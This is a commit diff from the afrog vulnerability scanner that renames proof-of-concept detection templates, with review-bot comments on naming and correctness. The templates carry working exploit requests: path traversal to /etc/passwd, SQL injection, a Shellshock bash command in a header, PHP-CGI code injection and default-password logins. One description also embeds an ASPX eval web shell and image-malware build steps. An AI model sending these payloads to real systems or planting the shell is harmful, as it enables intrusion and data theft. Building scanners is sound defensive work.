Projects STRLCPY afrog Commits 8692a1f1
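--- a/afrog-pocs/unreviewed/resin-cnnvd-200705-315.yml
+++ b/afrog-pocs/CNVD/2007/CNVD-200705-315.yaml
@@ -1,19 +1,15 @@
-id: resin-cnnvd-200705-315
+id: CNNVD-200705-315
 
 info:
- name: resin-cnnvd-200705-315
+ name: Caucho Resin Information Disclosure
  author: whynot(https://github.com/notwhy)
  severity: high
 
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /%20../web-inf/
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /")
 expression: r0()
 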
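Review bot: The new `id: CNNVD-200705-315` on line 1 does not match the new file name `CNVD/2007/CNVD-200705-315.yaml`; CNNVD and CNVD are different databases, so either the id or the directory/file name is wrong, and any tooling that keys on id == filename will miss this poc. Separately, this hunk and most others in the commit (e.g. CNVD-2019-01348, CNVD-2020-62422, CVE-2010-1871) drop `follow_redirects: false` without stating the engine's default; if the default is to follow redirects, a `response.status == 200` check can now match whatever page a redirect lands on, and CVE-2010-1871's rule, which asserts `response.status == 302 && response.headers["location"].contains(...)`, can never fire. Either confirm the default is not to follow, or keep the explicit `follow_redirects: false` on rules whose expression depends on the status code or the Location header.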
    afrog-pocs/CNVD/2017/CNVD-2017-20077.yaml
     1 +id: CNVD-2017-20077
     2 + 
     3 +info:
     4 + name: Ueditor编辑器.net版本存在文件上传漏洞
     5 + author: zan8in
     6 + severity: critical
     7 + description: |
     8 + <form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
     9 + http://vps/11.jpg?.aspx 11.jpg是图片马;制作图片马:copy 1.jpg/b +2.aspx 3.aspx
     10 + aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["zan8in"],"unsafe");%>
     11 + reference:
     12 + - https://www.CNVD.org.cn/flaw/show/CNVD-2017-20077
     13 + - https://zhuanlan.zhihu.com/p/85265552
     14 + - https://www.freebuf.com/vuls/181814.html
     15 + 
     16 +rules:
     17 + r0:
     18 + request:
     19 + method: GET
     20 + path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
     21 + headers:
     22 + Accept-Encoding: 'deflate'
     23 + follow_redirects: false
     24 + expression: |
     25 + response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
     26 +expression: r0()
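Review bot: The `description` block on lines 7-10 embeds an ASPX one-liner, image-polyglot build instructions and a hard-coded host `8.8.8.8`, none of which the rule uses: r0 only fingerprints `controller.ashx?action=catchimage` by the `没有指定抓取源` error string. Exploitation recipes in signature metadata add nothing to detection and are redistributed with every scanner install; replace the block with a one-line statement of the weakness, e.g. `description: Ueditor .NET controller.ashx catchimage file upload vulnerability (CNVD-2017-20077)`, and keep the `reference` list. Note also that the error string only shows the endpoint exists, not that the upload is unrestricted, so a `severity: critical` finding from this rule alone is prone to false positives and should be labelled as a fingerprint in `name` or `description`.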
    afrog-pocs/unreviewed/metinfo-lfi-cnvd-2018-13393.yml afrog-pocs/CNVD/2018/CNVD-2018-13393.yaml
    1  -id: metinfo-lfi-cnvd-2018-13393
     1 +id: CNVD-2018-13393
    2 2   
    3 3  info:
    4  - name: metinfo-lfi-cnvd-2018-13393
     4 + name: Metinfo file read
    5 5   author: JingLing(https://hackfun.org/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /include/thumb.php?dir=http\..\admin\login\login_check.php
    16 13   follow_redirects: true
    skipped 3 lines
    afrog-pocs/unreviewed/xiuno-bbs-cvnd-2019-01348-reinstallation.yml afrog-pocs/CNVD/2019/CNVD-2019-01348.yaml
    1  -id: xiuno-bbs-cvnd-2019-01348-reinstallation
     1 +id: CNVD-2019-01348
    2 2   
    3 3  info:
    4  - name: xiuno-bbs-cvnd-2019-01348-reinstallation
     4 + name: Xiuno BBS CNVD-2019-01348
    5 5   author: 清风明月(www.secbook.info)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /install/
    16 13   headers:
    17 14   Accept-Encoding: deflate
    18  - follow_redirects: false
    19 15   expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)")))
    20 16  expression: r0()
    21 17   
    skipped 1 lines
    afrog-pocs/unreviewed/coremail-cnvd-2019-16798.yml afrog-pocs/CNVD/2019/CNVD-2019-16798.yaml
    1  -id: coremail-cnvd-2019-16798
     1 +id: CNVD-2019-16798
    2 2   
    3 3  info:
    4  - name: coremail-cnvd-2019-16798
     4 + name: Coremail Information Disclosure
    5 5   author: cc_ci(https://github.com/cc8ci)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    skipped 8 lines
    afrog-pocs/unreviewed/discuz-ml3x-cnvd-2019-22239.yml afrog-pocs/CNVD/2019/CNVD-2019-22239.yaml
    1  -id: discuz-ml3x-cnvd-2019-22239
     1 +id: CNVD-2019-22239
    2 2   
    3 3  info:
    4  - name: discuz-ml3x-cnvd-2019-22239
     4 + name: Discuz!ML 3.x 任意代码执行
    5 5   author: X.Yang
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: GET
    17 14   path: /forum.php
    18  - follow_redirects: false
    19 15   expression: response.status == 200
    20 16   output:
    21 17   search: '"cookiepre = ''(?P<token>[\\w_]+)''".bsubmatch(response.body)'
    22 18   token: search["token"]
    23 19   r1:
    24 20   request:
    25  - cache: true
    26 21   method: GET
    27 22   path: /forum.php
    28 23   headers:
    29 24   Cookie: '{{token}}language=sc''.print(md5({{r1}})).'''
    30  - follow_redirects: false
    31 25   expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
    32 26  expression: r0() && r1()
    33 27   
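Review bot: The `set` variable `r1` (line 9) and the rule `r1` (line 19) share a name, so `{{r1}}` in the Cookie on line 24 and `md5(string(r1))` on line 25 refer to the random integer while `r1()` in the final expression refers to the rule, which reads as if the rule's result were being hashed. Renaming the variable, e.g. `rand: randomInt(800000000, 1000000000)`, `print(md5({{rand}}))` and `bytes(md5(string(rand)))`, removes the ambiguity. The same overlap exists in CVE-2014-3120, CVE-2015-1427, CVE-2015-5531 and CNVD-2021-09650.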
    afrog-pocs/unreviewed/joomla-cnvd-2019-34135-rce.yml afrog-pocs/CNVD/2019/CNVD-2019-34135.yaml
    1  -id: joomla-cnvd-2019-34135-rce
     1 +id: CNVD-2019-34135
    2 2   
    3 3  info:
    4  - name: joomla-cnvd-2019-34135-rce
     4 + name: Joomla configuration.php RCE
    5 5   author: X.Yang
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomLowercase(10)
    12 10   r2: randomLowercase(10)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   path: /
    19 16   headers:
    skipped 5 lines
    25 22   token: search["token"]
    26 23   r1:
    27 24   request:
    28  - cache: true
    29 25   method: POST
    30 26   path: /
    31 27   headers:
    skipped 7 lines
    afrog-pocs/unreviewed/xunchi-cnvd-2020-23735-file-read.yml afrog-pocs/CNVD/2020/CNVD-2020-23735.yaml
    1  -id: xunchi-cnvd-2020-23735-file-read
     1 +id: CNVD-2020-23735
    2 2   
    3 3  info:
    4  - name: xunchi-cnvd-2020-23735-file-read
     4 + name: Xxunchi Local File read
    5 5   author: 清风明月(www.secbook.info)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
    16 13   headers:
    17 14   Accept-Encoding: deflate
    18  - follow_redirects: false
    19 15   expression: response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors")))
    20 16  expression: r0()
    21 17   
    skipped 1 lines
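Review bot: `name: Xxunchi Local File read` on line 4 has a doubled `X`; the old id and the old file name spell the product `xunchi`, so this should read `name: Xunchi Local File Read`. Since the old name was just the id, this is the only human-readable label the poc carries, so the typo will surface in every report.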
    afrog-pocs/unreviewed/e-zkeco-cnvd-2020-57264-read-file.yml afrog-pocs/CNVD/2020/CNVD-2020-57264.yaml
    1  -id: e-zkeco-cnvd-2020-57264-read-file
     1 +id: CNVD-2020-57264
    2 2   
    3 3  info:
    4  - name: e-zkeco-cnvd-2020-57264-read-file
     4 + name: e-zkeco-CNVD-2020-57264-read-file
    5 5   author: ThestaRY (https://github.com/ThestaRY7/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /iclock/ccccc/windows/win.ini
    16 13   expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
    skipped 3 lines
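Review bot: `name: e-zkeco-CNVD-2020-57264-read-file` on line 4 is still the slug from the old id rather than a human-readable title, unlike the sibling renames in this commit (`Metinfo file read`, `Coremail Information Disclosure`); the same applies to `name: ecshop-CNVD-2020-58823-sqli` in CNVD-2020-58823. Something like `name: e-zkeco Arbitrary File Read` and `name: ECShop delete_cart_goods.php SQL Injection` would follow the convention the rest of the commit establishes.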
    afrog-pocs/unreviewed/ecshop-cnvd-2020-58823-sqli.yml afrog-pocs/CNVD/2020/CNVD-2020-58823.yaml
    1  -id: ecshop-cnvd-2020-58823-sqli
     1 +id: CNVD-2020-58823
    2 2   
    3 3  info:
    4  - name: ecshop-cnvd-2020-58823-sqli
     4 + name: ecshop-CNVD-2020-58823-sqli
    5 5   author: 凉风(http://webkiller.cn/)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(40000, 44800)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /delete_cart_goods.php
    18 15   body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
    skipped 4 lines
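--- a/afrog-pocs/cnvd/2020/seeyon-cnvd-2020-62422-readfile.yml
+++ b/afrog-pocs/CNVD/2020/CNVD-2020-62422.yaml
@@ -1,22 +1,17 @@
 id: CNVD-2020-62422
 
 info:
- name: seeyon-cnvd-2020-62422-readfile
+ name: 致远oa系统存在任意文件读取漏洞
  author: Aquilao(https://github.com/Aquilao)
  severity: medium
  reference:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
- tags: seeyon,cnvd
+ - https://www.CNVD.org.cn/flaw/show/CNVD-2020-62422
 
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
- follow_redirects: false
  expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
 expression: r0()
 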
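Review bot: The reference URL on line 8 changed from `https://www.cnvd.org.cn/...` to `https://www.CNVD.org.cn/...`, which looks like a case-sensitive bulk replace of `cnvd` to `CNVD` that spilled into URL text (the new CNVD-2017-20077 carries the same `www.CNVD.org.cn`). Hostnames are case-insensitive so the link still resolves, but the change is noise and suggests the replace was not restricted to the `id:` field; restore `- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422` and check the other references the same way.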
    afrog-pocs/unreviewed/h5s-video-platform-cnvd-2020-67113-unauth.yml afrog-pocs/CNVD/2020/CNVD-2020-67113.yaml
    1  -id: h5s-video-platform-cnvd-2020-67113-unauth
     1 +id: CNVD-2020-67113
    2 2   
    3 3  info:
    4  - name: h5s-video-platform-cnvd-2020-67113-unauth
     4 + name: H5S CONSOLE 存在未授权访问
    5 5   author: iak3ec(https://github.com/nu0l)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   h5s1:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /api/v1/GetSrc
    16 13   expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
    17 14   h5s2:
    18 15   request:
    19  - cache: true
    20 16   method: GET
    21 17   path: /api/v1/GetDevice
    22 18   expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
    skipped 3 lines
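--- /dev/null
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-04128.yaml
@@ -0,0 +1,17 @@
+id: CNVD-2021-04128
+ 
+info:
+ name: Datang AC Default Password
+ author: B1anda0(https://github.com/B1anda0)
+ severity: high
+ 
+rules:
+ r0:
+ request:
+ method: POST
+ path: /login.cgi
+ body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
+ expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
+expression: r0()
+ 
+ 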
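Review bot: This new poc has no `description` or `reference` under `info`, and its rule is a live authentication attempt (`POST /login.cgi` with `user=admin` and `password=123456`) that will appear in the device's login audit trail and may count toward a lockout policy where one exists. Add at least `reference:` pointing at the advisory (the other files use `https://www.cnvd.org.cn/flaw/show/<id>`) and a `description` stating that the rule logs in with default credentials, so operators can exclude it where a real login attempt is not acceptable. Lines 16-17 are two trailing blank lines; one is enough.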
    afrog-pocs/cnvd/2021/cnvd-2021-09650.yml afrog-pocs/CNVD/2021/CNVD-2021-09650.yaml
    1  -id: cnvd-2021-09650
     1 +id: CNVD-2021-09650
    2 2   
    3 3  info:
    4  - name: ruijie-eweb-rce-cnvd-2021-09650
     4 + name: 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞
    5 5   author: White(https://github.com/WhiteHSBG)
    6 6   severity: high
    7  - tags: huijietong,lfi
    8 7   reference:
    9 8   - https://xz.aliyun.com/t/9016?page=1
    10 9   - https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
    11 10   
    12  -manual: true
    13  -transport: http
    14 11  set:
    15 12   r1: randomLowercase(4)
    16 13   r2: randomLowercase(4)
    skipped 3 lines
    20 17  rules:
    21 18   r0:
    22 19   request:
    23  - cache: true
    24 20   method: POST
    25 21   path: /guest_auth/guestIsUp.php
    26 22   body: |
    skipped 1 lines
    28 24   expression: response.status == 200 && !response.body.bcontains(b'"success":false')
    29 25   r1:
    30 26   request:
    31  - cache: true
    32 27   method: GET
    33 28   path: /guest_auth/{{r2}}.php
    34 29   expression: response.status == 200 && response.body.bcontains(bytes(r1)) && !response.body.bcontains(b'"success":false')
    skipped 1 lines
    afrog-pocs/unreviewed/eea-info-leak-cnvd-2021-10543.yml afrog-pocs/CNVD/2021/CNVD-2021-10543.yaml
    1  -id: eea-info-leak-cnvd-2021-10543
     1 +id: CNVD-2021-10543
    2 2   
    3 3  info:
    4  - name: eea-info-leak-cnvd-2021-10543
     4 + name: EEA Information Disclosure
    5 5   author: Search?=Null
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /authenticationserverservlet
    16 13   expression: response.status == 200 && "<username>(.*?)</username>".bmatches(response.body) && "<password>(.*?)</password>".bmatches(response.body)
    skipped 3 lines
    afrog-pocs/cnvd/2021/ruijie-uac-cnvd-2021-14536.yml afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
    1  -id: ruijie-uac-cnvd-2021-14536
     1 +id: CNVD-2021-14536
    2 2   
    3 3  info:
    4  - name: ruijie-uac-cnvd-2021-14536
     4 + name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
    5 5   author: jweny(https://github.com/jweny)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /login.php
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
    18 14  expression: r0()
    19 15   
    afrog-pocs/unreviewed/shopxo-cnvd-2021-15822.yml afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
    1  -id: shopxo-cnvd-2021-15822
     1 +id: CNVD-2021-15822
    2 2   
    3 3  info:
    4  - name: shopxo-cnvd-2021-15822
     4 + name: ShopXO File Read
    5 5   author: Print1n(http://print1n.top)
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   Linux0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
    16  - follow_redirects: false
    17 13   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    18 14   Windows0:
    19 15   request:
    20  - cache: true
    21 16   method: GET
    22 17   path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
    23  - follow_redirects: false
    24 18   expression: response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support")
    25 19  expression: Linux0() || Windows0()
    26 20   
    skipped 1 lines
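--- a/afrog-pocs/unreviewed/wifisky-default-password-cnvd-2021-39012.yml
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-39012.yaml
@@ -1,20 +1,16 @@
-id: wifisky-default-password-cnvd-2021-39012
+id: CNVD-2021-39012
 
 info:
- name: wifisky-default-password-cnvd-2021-39012
+ name: Wifisky Default Password
  author: Print1n(http://print1n.top)
  severity: high
 
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: POST
  path: /login.php?action=login&type=admin
  body: username=admin&password=admin
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录,为保证设备安全,请立即修改密码\"}")
 expression: r0()
 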
    afrog-pocs/cve/2010/jboss-cve-2010-1871.yml afrog-pocs/CVE/2010/CVE-2010-1871.yaml
    1  -id: jboss-cve-2010-1871
     1 +id: CVE-2010-1871
    2 2   
    3 3  info:
    4  - name: jboss-cve-2010-1871
     4 + name: JBoss CVE-2010-1871
    5 5   author: fuping
    6 6   severity: medium
    7 7   reference:
    8 8   - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
    9 9   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871
    10 10   
    11  -manual: true
    12  -transport: http
    13 11  set:
    14 12   r1: randomInt(8000000, 10000000)
    15 13   r2: randomInt(8000000, 10000000)
    16 14  rules:
    17 15   r0:
    18 16   request:
    19  - cache: true
    20 17   method: GET
    21 18   path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d
    22  - follow_redirects: false
    23 19   expression: response.status == 302 && response.headers["location"].contains(string(r1 * r2))
    24 20  expression: r0()
    25 21   
    skipped 1 lines
    afrog-pocs/unreviewed/coldfusion-cve-2010-2861-lfi.yml afrog-pocs/CVE/2010/CVE-2010-2861.yaml
    1  -id: coldfusion-cve-2010-2861-lfi
     1 +id: CVE-2010-2861
    2 2   
    3 3  info:
    4  - name: coldfusion-cve-2010-2861-lfi
     4 + name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
    5 5   author: sharecast
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
    16 13   follow_redirects: true
    skipped 3 lines
    afrog-pocs/unreviewed/php-cgi-cve-2012-1823.yml afrog-pocs/CVE/2012/CVE-2012-1823.yaml
    1  -id: php-cgi-cve-2012-1823
     1 +id: CVE-2012-1823
    2 2   
    3 3  info:
    4  - name: php-cgi-cve-2012-1823
     4 + name: PHP CGI v5.3.12/5.4.2 RCE
    5 5   author: 17bdw
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   rand: randomInt(200000000, 210000000)
    12 10  rules:
    13 11   r0:
    14 12   request:
    15  - cache: true
    16 13   method: POST
    17 14   path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
    18 15   body: <?php echo md5({{rand}}); ?>
    19  - follow_redirects: false
    20 16   expression: response.body.bcontains(bytes(md5(string(rand))))
    21 17  expression: r0()
    22 18   
    skipped 1 lines
    afrog-pocs/cve/2014/elasticsearch-cve-2014-3120.yml afrog-pocs/CVE/2014/CVE-2014-3120.yaml
    1  -id: elasticsearch-cve-2014-3120
     1 +id: CVE-2014-3120
    2 2   
    3 3  info:
    4  - name: elasticsearch-cve-2014-3120
     4 + name: Elasticsearch CVE-2014-3120
    5 5   author: suancaiyu、violin
    6 6   severity: medium
    7 7   description: fofa app="elastic-Elasticsearch"
    8 8   
    9  -manual: true
    10  -transport: http
    11 9  set:
    12 10   r: randomInt(800000000, 1000000000)
    13 11   r1: randomInt(800000000, 1000000000)
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: POST
    19 16   path: /test/test1/123
    20 17   headers:
    skipped 5 lines
    26 23   expression: response.status == 201 || response.status == 200
    27 24   r1:
    28 25   request:
    29  - cache: true
    30 26   method: POST
    31 27   path: /_search
    32 28   headers:
    skipped 22 lines
    afrog-pocs/unreviewed/drupal-cve-2014-3704-sqli.yml afrog-pocs/CVE/2014/CVE-2014-3704.yaml
    1  -id: drupal-cve-2014-3704-sqli
     1 +id: CVE-2014-3704
    2 2   
    3 3  info:
    4  - name: drupal-cve-2014-3704-sqli
    5  - author:
     4 + name: Drupal SQL Injection
     5 + author: unkown
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: POST
    15 12   path: /?q=node&destination=node
    16 13   body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
    17  - follow_redirects: false
    18 14   expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
    19 15  expression: r0()
    20 16   
    skipped 1 lines
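Review bot: `author: unkown` on line 5 is a typo for `unknown`; the same value was added to CVE-2015-7297. If the author really is not known, either leave the field out or write `author: unknown`, so that a search for the value finds both files and the misspelling does not propagate into reports.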
    afrog-pocs/unreviewed/bash-cve-2014-6271.yml afrog-pocs/CVE/2014/CVE-2014-6271.yaml
    1  -id: bash-cve-2014-6271
     1 +id: CVE-2014-6271
    2 2   
    3 3  info:
    4  - name: bash-cve-2014-6271
     4 + name: ShellShock - Remote Code Execution
    5 5   author: neal1991(https://github.com/neal1991)
    6  - severity: high
     6 + severity: critical
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  set:
    11 9   r1: randomInt(800000000, 1000000000)
    12 10   r2: randomInt(800000000, 1000000000)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: GET
    18 15   headers:
    19 16   User-Agent: () { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'
    20  - follow_redirects: false
    21 17   expression: response.body.bcontains(bytes(string(r1 + r2)))
    22 18  expression: r0()
    23 19   
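Review bot: r0 has no `path:`; the request goes straight from `method: GET` on line 14 to `headers:` on line 15, so the probe presumably hits whatever the engine uses as its default path (likely `/`), while this bug is only reachable through a CGI-handled resource. Make the target explicit with `path: /` so the behaviour does not depend on the engine default, and say in `info` that the rule only detects root-level CGI exposure, so the raised `severity: critical` is not read as a broad Shellshock test.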
    afrog-pocs/cve/2015/elasticsearch-cve-2015-1427.yml afrog-pocs/CVE/2015/CVE-2015-1427.yaml
    1  -id: elasticsearch-cve-2015-1427
     1 +id: CVE-2015-1427
    2 2   
    3 3  info:
    4  - name: elasticsearch-cve-2015-1427
     4 + name: Elasticsearch CVE-2015-1427
    5 5   author: pululin(https://github.com/pululin)
    6 6   severity: high
    7 7   description: fofa app="elastic-Elasticsearch"
    8 8   
    9  -manual: true
    10  -transport: http
    11 9  set:
    12 10   r1: randomInt(40000, 44800)
    13 11   r2: randomInt(40000, 44800)
    14 12  rules:
    15 13   r0:
    16 14   request:
    17  - cache: true
    18 15   method: POST
    19 16   path: /test/test
    20 17   headers:
    skipped 5 lines
    26 23   expression: response.status == 201
    27 24   r1:
    28 25   request:
    29  - cache: true
    30 26   method: POST
    31 27   path: /_search
    32 28   headers:
    skipped 14 lines
    afrog-pocs/cve/2015/elasticsearch-cve-2015-3337-lfi.yml afrog-pocs/CVE/2015/CVE-2015-3337.yaml
    1  -id: elasticsearch-cve-2015-3337-lfi
     1 +id: CVE-2015-3337
    2 2   
    3 3  info:
    4  - name: elasticsearch-cve-2015-3337-lfi
     4 + name: Elasticsearch CVE-2015-3337
    5 5   author: X.Yang
    6 6   severity: medium
    7 7   description: fofa app="elastic-Elasticsearch"
    8 8   
    9  -manual: true
    10  -transport: http
    11 9  rules:
    12 10   r0:
    13 11   request:
    14  - cache: true
    15 12   method: GET
    16 13   path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
    17 14   expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
    skipped 3 lines
    afrog-pocs/cve/2015/elasticsearch-cve-2015-5531.yml afrog-pocs/CVE/2015/CVE-2015-5531.yaml
    1  -id: elasticsearch-cve-2015-5531
     1 +id: CVE-2015-5531
    2 2   
    3 3  info:
    4  - name: elasticsearch-cve-2015-5531
     4 + name: Elasticsearch CVE-2015-5531
    5 5   author: ha9worm(https://github.com/ha9worm)
    6 6   severity: medium
    7 7   description: fofa app="elastic-Elasticsearch"
    8 8   
    9  -manual: true
    10  -transport: http
    11 9  set:
    12 10   r1: randomLowercase(4)
    13 11  rules:
    14 12   r0:
    15 13   request:
    16  - cache: true
    17 14   method: PUT
    18 15   path: /_snapshot/{{r1}}
    19 16   headers:
    skipped 9 lines
    29 26   expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
    30 27   r1:
    31 28   request:
    32  - cache: true
    33 29   method: PUT
    34 30   path: /_snapshot/{{r1}}2
    35 31   headers:
    skipped 9 lines
    45 41   expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
    46 42   r2:
    47 43   request:
    48  - cache: true
    49 44   method: GET
    50 45   path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
    51 46   follow_redirects: true
    skipped 4 lines
    afrog-pocs/unreviewed/joomla-cve-2015-7297-sqli.yml afrog-pocs/CVE/2015/CVE-2015-7297.yaml
    1  -id: joomla-cve-2015-7297-sqli
     1 +id: CVE-2015-7297
    2 2   
    3 3  info:
    4  - name: joomla-cve-2015-7297-sqli
    5  - author:
     4 + name: Joomla Core SQL Injection
     5 + author: unkown
    6 6   severity: high
    7 7   
    8  -manual: true
    9  -transport: http
    10 8  rules:
    11 9   r0:
    12 10   request:
    13  - cache: true
    14 11   method: GET
    15 12   path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
    16 13   expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
    skipped 2 lines
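--- a/afrog-pocs/unreviewed/confluence-cve-2015-8399.yml
+++ b/afrog-pocs/CVE/2015/CVE-2015-8399.yaml
@@ -1,19 +1,15 @@
-id: confluence-cve-2015-8399
+id: CVE-2015-8399
 
 info:
- name: confluence-cve-2015-8399
+ name: Atlassian Confluence configuration files read
  author: whynot(https://github.com/notwhy)
- severity: high
+ severity: medium
 
-manual: true
-transport: http
 rules:
  r0:
  request:
- cache: true
  method: GET
  path: /spaces/viewdefaultdecorator.action?decoratorName
- follow_redirects: false
  expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
 expression: r0()
 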
    afrog-pocs/cve/2016/zabbix-cve-2016-10134-sqli.yml afrog-pocs/CVE/2016/CVE-2016-10134.yaml
    1  -id: zabbix-cve-2016-10134-sqli
     1 +id: CVE-2016-10134
    2 2   
    3 3  info:
    4  - name: zabbix-cve-2016-10134-sqli
     4 + name: Zabbix CVE-2016-10134
    5 5   author: sharecast
    6  - severity: high
     6 + severity: critical
     7 + reference:
     8 + - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
    7 9   
    8  -manual: true
    9  -transport: http
    10 10  set:
    11 11   r: randomInt(2000000000, 2100000000)
    12 12  rules:
    13 13   r0:
    14 14   request:
    15  - cache: true
    16 15   method: GET
    17 16   path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
    18 17   follow_redirects: true
    skipped 3 lines
    afrog-pocs/cve/2016/CVE-2016-3088.yml afrog-pocs/CVE/2016/CVE-2016-3088.yaml
